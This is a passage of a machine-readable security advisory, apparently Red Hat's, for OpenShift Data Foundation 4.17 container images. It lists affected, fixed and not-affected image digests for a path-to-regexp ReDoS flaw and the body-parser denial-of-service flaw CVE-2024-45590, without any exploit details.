"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "path-to-regexp: Backtracking regular expressions cause ReDoS"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
